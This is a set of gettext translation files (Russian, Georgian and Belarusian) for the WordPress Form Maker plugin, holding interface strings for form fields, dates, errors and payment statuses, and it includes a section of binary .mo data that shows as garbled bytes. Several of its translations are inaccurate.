msgid "August"
msgstr "Августа"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "Сентября"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "Oктябрь"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "Ноябрь"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "Декабрь"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Ошибка, неверный код безопасности."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr ""
"Ваш IP занесен в черный список. Пожалуйста, обратитесь к администратору сайта"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "Файл превышает допустимый размер"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "К сожалению, вы не можете загрузить этот тип файла."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Ошибка, файл не может быть перемещен."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr ""
"Это поле %s требует уникальную запись, и эта величина уже представлены."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Ошибка, адрес электронной почты не был отправлен."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Ничего не было представлено."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Ваша форма была успешно представлена."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Ошибка, адрес электронной почты не был отправлен."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Ваш адрес электронной почты уже проверен."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Ваше сообщение было успешно проверено."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Ваш адрес электронной почты подтверждение истекло."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Проверка ссылка является недействительным."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "поле обязательно для заполнения."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Это не адрес электронной почты."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr "Вы не можете выбрать бывших даты. Выберите дату, начиная с текущего."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "The"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "Значение должно быть между"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "Количество"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Ваша оценка должна быть не менее"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Тема исследования"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "первый"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Последний"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Середина урока"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "код города"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Номер телефона"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "Долларов"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "Центов"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "От"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "До"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "перейти "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "Сброс "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Выберите поле "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Выберите Дата"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-ka_GE.mo000060400000012442152434416630012144 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
T
a
w
�
�
�
�
A�
J!Sl��	��,?R_oL���
:'
b
~
(�
%�
�
�>�+�2?QC��2T��Q�����h{h�gM��eS/�8�4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 16:59+0400
PO-Revision-Date: 2015-05-22 16:59+0400
Last-Translator: 
Language-Team: 
Language: ka
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
აპრილიკოდიაგვისტოცენტიქალაქიქვეყანადეკემბერიდოლარიშეცდომა, ელ არ გაეგზავნა.შეცდომა, ფაილი ვერ გადავიდა.შეცდომა, არასწორი დამცავი კოდი.თებერვალიპირველიდანგადასვლა იანვარიივლისიივნისიბოლომარტიმაისიახლოარაფერი არ იყო გამოგზავნილი.ნოემბერიოქტომბერიტელეფონისაფოსტო / საფოსტო კოდირაოდენობარესეტი აირჩიეთ თარიღიაირჩიეთ სფეროსექტემბერიუკაცრავად, მაგრამ თქვენ არ გაქვთ ატვირთვა ასეთი ტიპის ფაილი.სახელმწიფო / Province / რაიონიქუჩის მისამართიქუჩის მისამართი Line 2Theფაილი აღემატება დასაშვებ ზომაეს ველი %s მოითხოვს უნიკალური შესვლის და ამ მნიშვნელობის უკვე წარადგინა.ეს არ არის სწორი ელ.სათაურიუნდაგადამოწმების ბმული არასწორია.თქვენ არ შეგიძლიათ შეარჩიოთ ყოფილი ვადები. აირჩიეთ თარიღი დაწყებული მიმდინარე ერთი.თქვენი ელექტრონული ფოსტის მისამართი უკვე დადასტურებულია.თქვენი ელ-ფოსტა წარმატებით დადასტურდა.თქვენი ელ გადამოწმების შედეგად გავიდა.თქვენს ფორმას წარმატებით წარმოადგინა.თქვენი IP არის შავ სიაში. დაუკავშირდით ნახვა ადმინისტრაციასთქვენი ანგარიში არ უნდა აღემატებოდეს ველი აუცილებელია.ღირებულება უნდა იყოსlanguages/form_maker-be_BY.po000060400000060703152434416630012164 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 16:50+0400\n"
"PO-Revision-Date: 2015-05-22 16:50+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: be\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Адрас"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Адрас радок 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Горад:"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Штат / Вобласць / рэгіён"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Паштовы / Індэкс"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "&Прымацаваць"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Студзень"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "Люты"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "Сакавік"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "Красавік"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Травень"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "Чэрвень"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Ліпень"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "Жнівень"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "Верасень"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "Кастрычнік"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "Лістапад"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "Снежань"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Памылка, няслушны код бяспекі."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr ""
